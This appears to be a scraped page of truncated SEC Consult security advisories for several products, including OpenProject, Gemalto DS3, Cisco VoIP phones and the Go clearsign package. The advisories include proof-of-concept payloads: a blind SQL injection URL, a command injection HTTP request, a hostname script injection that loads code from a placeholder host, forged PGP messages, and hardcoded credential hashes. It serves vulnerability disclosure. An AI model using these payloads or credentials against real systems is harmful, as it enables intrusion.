{"success":true,"data":{"queryUrl":"https://[snip]","authUrl":"https://[snip]","userId":"[snip]","pw":"[snip]","allowedRequests":100,"allowedRequestsInterval":60,"queueMaxSize":10,"cacheMaxSize":5,"refreshInterval":30,"waitForHttpRequests":true,"settings":{"query-url":"https://[snip]","queue-max-size":10,"password":"[snip]","allowed-requests":100,"auth-url":"https://[snip]","user-id":"[snip]","refresh-interval-seconds":{"seconds":2592000,"milliSeconds":259200},"cache-max-size":5,"wait-for-http-request":true,"allowed-requests-interval-seconds":{"seconds":60,"milliSeconds":6
Vulnerable / tested versions:
-
The identified vulnerability has been verified to exist in the
RSA NetWitness platform, version 11.1.0.1.
According to the vendor, platform version 10 is also affected.
The following versions are vulnerable:
* <10.6.6.1
* <11.2.1.1
Vendor contact timeline:
2018-10-01: Contacting vendor through PGP via sec...@dell.com
2018-10-02: Vendor acknowledges the information was received, forwards
the info to the relevant department
2018-10-11: Vendor confirms the impact of the authorization issue,
starts to work on the remediation timeline
2018-10-15: Vendor provides additional information
2018-10-22: Contacting vendor to provide the remediation timeline
2018-10-23: Further email exchange related to the remediation timeline
2019-01-18: Vendor provides an update on the fix timeline
2019-03-05: Asking for a status update
2019-03-06: Vendor provides a status update on the release, patch for
platform version 11 will be released in March, version 10
Mid-April
2019-04-01: Asking for a specific release date & further status update
2019-04-01: Vendor: release is scheduled for 23rd April 2019, but may change,
they will inform us
2019-05
SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)
SEC Consult Vulnerability Lab Security Advisory < 20190513-0 >
===
title: Cleartext message spoofing
product: Supplementary Go Cryptography Libraries
vulnerable version: commit a5d413f7728c81fb97d96a2b722368945f651e78
branch master (https://github.com/golang/crypto.git)
fixed version: commit c05e17bb3b2dca130fc919668a96b4bec9eb9442
CVE number: CVE-2019-11841
impact: High
homepage: https://golang.org
found: 2019-03-28
by: Aida Mynzhasova (Office Berlin)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Package clearsign generates and processes OpenPGP, clear-signed data. See
RFC 4880, section 7.
Clearsigned messages are cryptographically signed, but the contents of the
message are kept in plaintext so that it can be read without special tools."
Source: https://godoc.org/golang.org/x/crypto/openpgp/clearsign
Business recommendation:
During a short security test, SEC Consult found a severe security vulnerability
in the clearsign package of supplementary Go cryptography libraries.
This vulnerability could allow an attacker:
- to lead a victim to believe the signature was generated using a different
message digest algorithm than what was actually used;
- to spoof clearsign OpenPGP messages by prepending arbitrary
text to cleartext messages without invalidating the signatures.
Vulnerability overview/description:
---
1) Cleartext message spoofing
According to RFC 4880 chapter 7 the cleartext signed message can contain one
or more optional "Hash" Armor Headers. The "Hash" Armor Header specifies the
message digest algorithm(s) used for the signature. However, the package
"clearsign" in supplementary Go cryptography libraries ignores the value of this
header which allows an attacker to spoof it.
Thereby an attacker can lead a victim to believe the signature was generated
using
a different message digest algorithm than what was actually used. Moreover,
since
the library skips Armor Header parsing in general, an attacker can not only
embed
arbitrary Armor Headers, but also prepend arbitrary text to cleartext messages
without invalidating the signatures.
Proof of concept:
-
1) Cleartext message spoofing
The following cleartext message with a valid SHA-1 signature was generated using
GnuPG:
(content of no_spoof.asc file):
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Message to be signed
-BEGIN PGP SIGNATURE-
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-END PGP SIGNATURE-
Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:
(content of hash_spoof.asc file):
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
Message to be signed
-BEGIN PGP SIGNATURE-
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-END PGP SIGNATURE-
Finally, a string containing Unicode-encoded "LINE TABULATION" was embedded in
the Armor Header of the message:
(content of cleartext_spoof.asc file):
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512\u000bThis data is part of the header
Message to be signed
-BEGIN PGP SIGNATURE-
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-END PGP SIGNATURE-
When inserting the "LINE TABULATION" character, the header text after the
attached
character looks as if it were p
SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
===
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found: 2019-04-17
by: T. Soo (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"OpenProject is the leading open source project management software.
Support your project management process along the entire project
life cycle: From project initiation to closure."
Source: https://www.openproject.org/
Business recommendation:
The vendor provides a patch which should be applied immediately.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security issues.
Vulnerability overview/description:
---
An SQL injection vulnerability has been identified in the web "activities API".
An unauthenticated attacker could successfully perform an attack to extract
potentially sensitive information from the database if OpenProject is configured
not to require authentication for API access.
Proof of concept:
-
Requesting the following URL will trigger a time delay as a proof of concept
for exploiting the blind SQL injection:
http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d
Vulnerable / tested versions:
-
The vulnerability has been identified in OpenProject version 8.3.1 which
was the most current version at the time of discovery.
According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
Older versions (< 5.0.0) are not vulnerable.
Vendor contact timeline:
2019-04-30: Contacting vendor through secur...@openproject.com
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory
Solution:
-
The vendor provides a patched version 8.3.2 and a security notice with further
information:
https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Thanaphon Soo / @2019
smime.p7s
Description: S/MIME Cryptographic Signature
SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
===
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio
Server
vulnerable version: Ezio DS3 server https://www.gemalto.com
found: 2019-02-11
by: TING Meng Yean (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions.
DS3 has been acquired by Gemalto, and the Authentication Server is now known
as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.
Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source:
https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital
Business recommendation:
The vendor provides a patch and users of this product are urged to
upgrade to the latest version available.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.
Vulnerability overview/description:
---
The DS3 Authentication Server is prone to several security issues as described
below that when combined, allows a low-privileged application user to upload a
JSP web shell with the access rights of the lower privileged Linux system
user "asadmin".
The CVSSv3 scores have been provided by the vendor.
1) Semi-Blind OS Command Injection (Post-authenticated)
- CVE-2019-9156
- CWE-78
- CVSSv3: 6.8 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".
2) Limited Local File Disclosure (LFD) (Post-authenticated)
- CVE-2019-9157
- CWE-538
- CVSSv3: 5.7 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several administration tools to check the
system's access and error logs. "TailLogs.jsp" does not correctly validate the
user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary
local files with the privileges of the local system user "asadmin".
3) Broken Access Control (Post-authenticated)
- CVE-2019-9158
- CWE-284
- CVSSv3: 5.7 (Medium)
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several permission groups, granting
different
levels of privileges, from the administrative "dsssAdmin" group to the low
privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see more
functions in the menu of the web portal than a user with the "READ_ONLY" group.
However, the user with the "READ_ONLY" group can access some "dsssAdmin"
functions by replaying the POST or GET request directly.
Proof of concept:
-
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)
This POC was performed using a user with the "READ_ONLY" group permission.
This exploit also has the following two restrictions:
1) The bash commands injected cannot contain any space (' '/%20).
2) The output of the bash commands injected must be null or cannot contain any
space (' '/%20). However, the tester was able to create complex bash commands
payload without any space (' '/%20) by using a bash trick.
The simple OS command payload "whoami" injected into the "HOST_NAME"
parameter and the HTTP response with the result of the payload
"asadmin" mixed in. Please note that the OS command payload is enclosed
with the `` characters.
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
CSRFTOKEN=_NAME=127.0.0.1`whoami`_NUMBER=8443_RESULTS=%0D%0A%09%09%09%09%09%09
HTTP/1.1 200 OK
Str
SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government
A blog post with further information has been released on this topic as well:
https://r.sec-consult.com/osci
SEC Consult Vulnerability Lab Security Advisory < 20190205-0 >
===
title: Multiple vulnerabilities
product: OSCI-Transport Library 1.2 for German e-Government
vulnerable version: <=1.8.1
fixed version: 1.8.3
CVE number: -
impact: low - critical
(highly dependent on the usage scenario)
homepage: http://www.xoev.de
found: 2018-09
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
(German)
"Mit der Spezifikation des Protokolls OSCI–Transport in der Version 1.2 wird ein
sicheres, herstellerunabhängiges und interoperables Datenaustauschformat
beschrieben.
Um die Implementierung für Anwender in der öffentlichen Verwaltung sowie der
Fachverfahrenshersteller zu erleichtern, wird die OSCI 1.2 Bibliothek angeboten:
Die Bibliothek implementiert OSCI–Transport in der Version 1.2 und ist damit
unabhängig von Fachinhalten. Sie ist Bestandteil der OSCI-Transport
Infrastruktur. Die OSCI-Transport-Bibliothek soll in Fachverfahren (auf
Verwaltungsseite) oder Clientsystemen (auf Kundenseite) implementiert werden."
Source:
https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310
Business recommendation:
The OSCI 1.2 Transport Library is intended to provide a secure message exchange
channel over an untrusted network (i.e. the Internet) for German government
agencies.
In 2017 SEC Consult found several critical security vulnerabilities in the OSCI
1.2 Transport library version 1.6.1. These vulnerabilities have been addressed
in version 1.7.1. Further details to these vulnerabilities can be found here:
https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/
In 2018 SEC Consult identified vulnerabilities in this library again.
An attacker could use these vulnerabilities to forge signatures of
request-and-response-signed and request-and-response-encrypted messages. Whether
there is an impact to the content-signature and content-encryption was not fully
examined!
As the newly identified vulnerabilities are similar to the vulnerabilities
identified in 2017 and due to high complexity of this library, SEC Consult
suspects further vulnerabilities that have not yet been discovered.
Therefore, SEC Consult, strongly recommends KoSIT and its partners to conduct a
full security audit of the software component.
Vulnerability overview/description:
---
1) Insecure Cryptographic Algorithm
KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM.
Currently, the OCSI 1.2 Transport library still supports the following legacy
encryption algorithms:
* http://www.w3.org/2001/04/xmlenc#tripledes-cbc
* http://www.w3.org/2001/04/xmlenc#aes128-cbc
* http://www.w3.org/2001/04/xmlenc#aes192-cbc
* http://www.w3.org/2001/04/xmlenc#aes256-cbc
All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption
algorithms as recent advances in cryptanalysis [...] have cast doubt on the
ability of CBC block encryption algorithms to protect plain text when used with
XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)
Although these have been marked as deprecated, AES256-CBC is still used by
default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM).
The Padding Oracle attack that was demonstrated previously by SEC Consult was
found to be no longer exploitable trivially. However, another approach was found
that allows an attacker to bypass transport encryption.
This attack abuses the fact that the server leaks whether a decrypted string
contains a colon (more specifically whether it is a valid MIME-Header in the
form of :).
By sending multiple requests and observing whether the decrypted string contains
a colon, an attacker can narrow down the possible values for a single plain text
character. When the number of possible values is one, the plain text byte is
known. The attacker can use this approach to decrypt all characters of a given
cipher text.
2) Signature Bypass
SEC Consult previously demonstrated an XML Signature Wrapping attack. While this
exact attack is no longer possible, another similar attack was identified.
XML signatures are constructed as follows:
* an element "SignedInfo" contains multiple "Reference" elements, each
referring to a signed element. The contents
SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 >
===
title: Cross-site scripting
product: CA Automic Workload Automation Web Interface (AWI)
(formerly Automic Automation Engine, UC4)
vulnerable version: 12.0, 12.1, 12.2
fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1
CVE number: CVE-2019-6504
impact: medium
homepage: https://www.ca.com
found: 2018-10-15
by: Marc Nimmerrichter (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"The modern enterprise needs to orchestrate a complex, diverse landscape of
applications, platforms and technologies. Workload automation can prove a
critical differentiator, but only if it provides intelligent automation driven
by data analytics.
[...]
CA Automic Workload Automation gives you the agility, speed, visibility and
scalability needed to respond to the constantly changing technology landscape.
It centrally manages and automates the execution of business processes
end-to-end; across mainframe, cloud and hybrid environments in a way that never
stops—even when doing an upgrade to the next version."
Source: https://www.ca.com/us/products/workload-automation-solution.html
Business recommendation:
Be aware that restrictions on privileges can be bypassed and that attackers may
be able to take over other users' accounts. SEC Consult recommends to apply the
vendor patch as soon as possible.
Vulnerability overview/description:
---
The Automation Engine Web Interface, short AWI, is susceptible to a
persistent cross-site scripting attack (XSS). The origin of this vulnerability
is in an outdated version of the Vaadin framework (version 7.7.9), which is
heavily used in the implementation of the UI. This version of the Vaadin
framework is vulnerable to an XSS vulnerability in tooltips [1]. If attackers
can control the content of tooltips created with the framework, they can execute
arbitrary JavaScript code in the context of the user viewing the tooltip. AWI
uses tooltips for various data-fields, e.g. for the title of objects created.
Thus, if a user has the privilege to create or edit objects, they can inject
JavaScript code, which will get executed by other users if they move their
cursor over the text containing the tooltip.
[1] https://github.com/vaadin/framework/issues/8731
Proof of concept:
-
The vulnerability can be reproduced by creating/editing any object in AWI and
using a normal JavaScript payload, e.g. with an onerror handler.
Because tooltips are only shown in AWI when the text length exceeds the column
width, the text needs to be padded with some sample-text to make sure the
JavaScript code gets executed.
Vulnerable / tested versions:
-
The tested version of AWI was 12.2.0.
Vendor contact timeline:
2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email.
2018-10-25: Vendor confirms the receipt of the vulnerability information.
2018-11-22: Vendor confirms the vulnerability and asks for postponement of
advisory release date.
2018-12-11: Vendor provides planned patch numbers.
2018-01-17: Vendor informs SEC Consult that patches have been published.
2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release
date for SEC Consult advisory and CA Technologies Security Notice.
2019-01-24: Public release of security advisory
Solution:
-
The vendor provides patched versions:
Automic.Web.Interface 12.0.6 HF2
Automic.Web.Interface 12.1.3 HF3
Automic.Web.Interface 12.2.1 HF1
Available from: https://downloads.automic.com/
The vendor released a security advisory which is available here:
https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive tech
SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
===
title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
vulnerable version: See list of vulnerable devices/firmwares below
fixed version: 12.5.1 MN
CVE number: CVE-2018-0461
impact: high
homepage: https://www.cisco.com
found: 10/2018
by: W. Schober, IoT Inspector (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes
seeking secure, high-quality, full-featured VoIP. Select models provide
affordable entry to HD video and support for highly-active, in-campus mobile
workers."
Source:
https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html
Business recommendation:
SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN),
where all the documented issues are fixed according to the vendor.
We want to thank Cisco for the very professional response and great
coordination.
Vulnerability overview/description:
---
1) Arbitrary Script Injection
The VOIP phones can be managed directly via the integrated keyboard and the
built-in screen. In the configuration menu a few spots allow users to input
text via the integrated keyboard into text boxes (e.g. Hostname). Those text
input fields are prone to JavaScript-like code injection. An attacker is able
to inject arbitrary payloads via the T9 keyboard.
2) Hard coded and weak secrets
(Identified during an automated firmware analysis by IoT Inspector)
The firmware, which is directly served from Cisco, contains multiple hard coded
password hashes. They are stored in the /etc/passwd file and are hashed using
an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere.
Access via SSH using those credentials is possible.
Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password
it was easily possible to brute-force the password within seconds.
3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the
built-in web application, which is running on the VOIP phone,
were identified. Those routes lead to parts of the web application that are
neither documented nor officially mentioned anywhere by Cisco. Those parts of
the web application allow an attacker to debug the device and create memory
dumps.
4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version
numbers. It is not known which patches got backported by the vendor but Cisco
mentioned that they have implemented some. The potentially affected components
are:
-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation “pp_key”
-) Linux Kernel Privilege Escalation “Mempodipper”
-) Multiple Linux Kernel CVE entries
Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco
Proof of concept:
-
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VOIP phone via the built-in
screen. There are also multiple locations, where user-input is parsed and
displayed. It was possible to inject arbitrary (JavaScript) code directly into
the phone UI. As an example the hostname of the VOIP Phone can be changed to
the following value:
hostname“>http://$IP/sec.js onload=exec()>
The sec.js gets loaded from the remote host immediately and the exec function
is executed.
< A screenshot can be found online on our website >
Further analysis has not been performed, but depending on the underlying
libraries/system in use, it might be possible to get system level access via
this attack vector.
2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user
debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd
$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))
This hash corresponds to the following clear-text password: debug
The password for the user root and default is also stored in the /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default
3) Undocumented debug functionality
The built-in VOIP phone web server offers multiple functionalities for the
end-user. During a manual analysis, undocumented endpoints with critical
functionality got identified. The functionality can be found by visiting
the following endpoint:
SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 >
===
title: Inadequate cryptography implementation
product: Kerio Control VPN protocol
vulnerable version: <=9.2.7
fixed version: 9.2.8
CVE number: -
impact: High
homepage: http://www.kerio.com/products/kerio-control
found: 2018-10
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"Protect your network from viruses, malware and malicious activity with Kerio
Control, the easy-to-administer yet powerful all-in-one security solution.
Kerio Control brings together next-generation firewall capabilities -- including
a network firewall and router, intrusion detection and prevention (IPS), gateway
anti-virus, VPN, and web content and application filtering. These comprehensive
capabilities and unmatched deployment flexibility make Kerio Control the ideal
choice for small and mid-sized businesses."
"Link headquarters to remote users and branch offices securely and easily.
Kerio’s own VPN tunneling with dead-simple setup requires minimal configuration,
and provides a high performance network connection. Or, use industry-standard
IPsec/L2TP for connectivity from mobile devices or third-party firewalls.
Enable 2-step verification for an extra layer of security on all forms of
remote access."
Source: http://www.kerio.com/products/kerio-control
Business recommendation:
During a quick evaluation of the Kerio Control VPN protocol, it was apparent,
that the cryptographic protocol employed exhibited severe design issues.
Generally, SEC Consult strongly recommends to prefer well-established standard
cryptographic protocols rather than proprietary protocols wherever possible
(e.g. DTLS, IPsec). Due to their widespread use, they generally receive much
greater attention by experts. Therefore, many design issues with these protocols
have already been detected and mitigated since.
We therefore recommend businesses to switch from Kerio's proprietary VPN
protocol to a standard protocol (Kerio Control e.g. supports IPsec).
Note that no full audit of Kerio Control, Kerio VPN or the cryptographic
protocol has been conducted. In addition to the vulnerabilities described
here, we already identified critical vulnerabilities in Kerio Control in 2016.
Hence we suspect there are more major security deficiencies in the product.
We therefore recommend GFI software to greatly increase the efforts towards
product security in order to keep customers secure.
We want to explicitly thank GFI for the professional handling of the
communication during this whole process.
Vulnerability overview/description:
---
After a TLS connection is established between the Kerio VPN client and the
Kerio Control appliance and cryptographic keys have been securely transferred
over this connection, the data sent through the VPN is transmitted in UDP
packets. Each of these packets is encrypted using Blowfish in CTR mode.
As this mode does not provide data authenticity, encrypted data that is modified
by an attacker results in predictable modification of the plaintext. More
precisely, bits that are flipped in the ciphertext result in the same bits being
flipped in the plaintext after decryption.
Each encrypted UDP datagram contains a simple checksum (the same checksum used
by IPv4). Assuming an attacker knows the plaintext data of a datagram and is
able to modify its ciphertext, it is trivial to change parts of the message,
e.g. inject content into the encrypted stream, while keeping the resulting
checksum identical.
Proof of concept:
-
SEC Consult provided a proof of concept exploit script to GFI but it has been
removed from this advisory in order to give customers more time to upgrade the
infrastructure.
Vulnerable / tested versions:
-
The version 9.2.7 build 2921 was found to be vulnerable. This version was the
latest at the time of discovery and older versions are affected as well.
Vendor contact timeline:
2018-10-17: Creating support case at https://gfisoftware.force.com, asking for
security contact
2018-10-17: GFI support: Asking to upload advisory to support portal
2018-10-19: Uploading advisory
2018-10-22: GFI support: Escalated to engineers to further investigate
2018-10-25: GFI support acknowledges vulnerability
2018-11-08: GFI support: Beta version with patch available (with AES 128)
2018-11-09: Asking for release date of the patch
2018-11-12: GF
SEC Consult SA-20181130-0 :: Multiple Vulnerabilities in Siglent Technologies SDS 1202X-E Digital Oscilloscope
SEC Consult Vulnerability Lab Security Advisory < 20181130-0 >
===
title: Multiple Vulnerabilities
product: Siglent Technologies SDS 1202X-E Digital Oscilloscope
vulnerable version: V5.1.3.13
fixed version: -
CVE number: -
impact: High
homepage: http://siglenteu.com/
https://www.siglent.eu/
https://www.siglentamerica.com/
found: 2018-08-06
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===
Vendor description:
---
"SIGLENT is an international high-tech company, concentrating on R, sales,
production and services of measurement products. As an ISO9001:2000
International Quality Management System and ISO 14001:2004 Environmental
Management System Certified company, SIGLENT is also a member of the China
Electronic Instrument Industry Association and Guangdong Instrument
Representative Association.
[...]
SIGLENT focuses on the electronic test & measurement instrument industry and
sees research & development as a core competency, while keeping a strong
competitive edge through technology innovation and strict quality control. Try
a Siglent product. Then compare the performance and the features to any other
model, any other brand. Then compare the price. We believe there is no better
value anyplace."
Source: http://www.siglenteu.com/about.aspx
Business recommendation:
The identified backdoor accounts are accessible through Telnet, hence a
compromise
of the device via a local network attack is possible.
Any malicious modification of measurement values may have serious impact on the
product or service which is created or offered by using this oscilloscope.
Therefore, all procedures which are executed with this device are untrustworthy.
SEC Consult recommends not to use this product within a network of a production
environment until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
The vendor was unresponsive and did not provide a patch.
Vulnerability overview/description:
---
1) Hardcoded Backdoor Accounts
Two backdoor accounts are present on the system. A Telnet service is listening
on port 23 which enables an attacker to connect as root to the oscilloscope via
LAN.
The password hashes are hardcoded and are difficult to change for the end user
because the "shadow" file is stored on a cramfs (intentionally write-only)
file system.
2) Missing Authentication / Design Issue
The software "EasyScopeX" can be used from any computer in the network to
configure and interact with the oscilloscope. This is possible without prior
authentication which enables everyone to change settings on the oscilloscope.
3) Unencrypted Communication
The software "EasyScopeX" communicates via unencrypted TCP packets with the
client computer / oscilloscope.
4) Outdated and Vulnerable Software Components
Multiple software components embedded in the firmware are outdated and found
to be vulnerable to various publicly known security issues.
Proof of concept:
-
1) Hardcoded Backdoor Accounts
The following password hashes were dumped from "/etc/shadow" by connecting to
the UART interface on the PCB:
root
siglent
(The password hashes have been removed from this advisory)
2) Missing Authentication / Design Issue
It is sufficient to install the "EasyScopeX" software and control the
oscilloscope
without any authentication.
3) Unencrypted Communication
The software "EasyScopeX" communicates in plaintext via various ports by using
the portmapper. The default ports are "5024" and "5025".
4) Outdated and Vulnerable Software Components
Using the IoT Inspector software we found the following outdated and vulnerable
components:
* BusyBox 1.20.1
* GNU glibc 2.13
* Linux Kernel 3.19.0
Vulnerable / tested versions:
-
The following device / firmware version has been tested:
* Siglent SDS1202X-E (V5.1.3.13)
It is assumed that other firmware versions are affected as well.
Vendor contact timeline:
2018-08-22: Contacting German VDE CERT for coordination support
2018-09-04: Asking for a status update from the vendor
2018-09-05: VDE CERT: no response from vendor yet
2018-09-12: US sales person from Siglent has answered, VDE CERT
is sending advisory to be forwarded to engineering
2018-10-10: Asking for a status update (affected versions, etc)
2018-10-10
